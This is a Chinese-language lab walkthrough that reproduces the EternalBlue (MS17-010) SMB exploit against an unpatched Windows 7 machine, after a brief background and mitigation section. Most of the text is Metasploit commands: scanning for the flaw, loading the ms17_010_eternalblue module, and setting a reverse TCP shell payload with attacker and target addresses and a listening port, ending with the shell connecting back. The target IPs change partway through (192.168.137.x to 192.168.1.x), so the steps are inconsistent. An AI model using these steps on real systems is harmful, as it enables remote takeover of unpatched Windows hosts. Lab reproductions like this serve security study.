背景介绍
原理:“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器,利用Windows系统的SMB漏洞可以获取系最高权限。
影响范围:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。
防范措施:及时更新Windows系统补丁;不要轻易打开陌生的文件;关闭445、139端口。
环境:
攻击机:kali IP:192.168.137.44
靶机:win7 IP:192.168.137.190 (开放445端口且没有打补丁)
工具:MSF框架
漏洞复现:
nmap对靶机进行扫描
1. 在kali终端打开metasploit
msfconsole
2. 寻找永恒之蓝相关扫描模块
search ms17-010
3. 利用扫描模块扫描确定漏洞
- 利用smb_ms17_010漏洞扫描模块,利用它可以确定目标是否存在该漏洞。
use auxiliary/scanner/smb/smb_ms17_010
- 查看需要填充哪些参数
show options
RHOSTS参数是你即将扫描的网段,当然也可以只有一个主机IP
- 设置靶机IP地址
set rhosts 192.168.137.190
- 开始扫描
exploit 或 run 都表示开始执行
如果结果中前面有个绿色的加号,则说明可以利用该漏洞
4. 利用攻击模块攻击
- 选择攻击模块
use exploit/windows/smb/ms17_010_eternalblue
- 选择payload
set payload generic/shell_reverse_tcp
- 设置rhost(靶机IP)
set rhost 192.168.1.103
- 设置lhost(攻击机IP)
set lhost 192.168.1.105
- 设置监听端口(默认是4444)
set lport 500
6) 开始攻击
exploit 或 run
5. 反弹shell
win7查看端口建立连接
netstat -an